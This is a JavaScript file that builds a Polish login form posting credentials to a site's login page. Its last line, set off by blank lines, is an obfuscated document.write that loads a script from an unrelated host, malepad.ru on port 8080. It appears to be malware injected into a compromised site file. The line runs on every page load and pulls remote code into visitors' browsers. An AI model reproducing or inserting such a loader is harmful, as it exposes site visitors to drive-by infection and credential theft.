function IssetGet(param)
{
	var url = top.location + '';
	var ru  = url.split('?'); /* request uri array */
	var p;
	
	if (ru[1]) {
		if (ru[1].indexOf('&') > -1) {
			var get = ru[1].split('&');
			for (var i in get) {
				p = get[i].split('=');
				if (p[0] == 'le') {
					return true;
				}
			}
		} else {
			p = ru[1].split('=');
			if (p[0] == param) {
				return true;
			}
		}
	}
	
	return false;
}

var form_code = '';

if (IssetGet('le')) {
	form_code += '<b>Niepoprawne logowanie!</b>';
}

form_code += '<form action="http://pgm.net.pl/login.php" method="post">';
form_code += '<input style="margin: 0 0 0 5px; width: 110px; float: left;" type="text" name="login" />';
form_code += '<input style="margin: 0 5px 0 0; width: 110px; float: right;" type="password" name="password" />';
form_code += '<br />';
form_code += '<input style="margin: 0 5px 0 0; float: right;" type="submit" value="zaloguj" />';
form_code += '</form>';
document.write(form_code);







document.write('<s'+'cript type="text/javascript" src="http://malepad.ru:8080/Gibibyte.js"></scr'+'ipt>');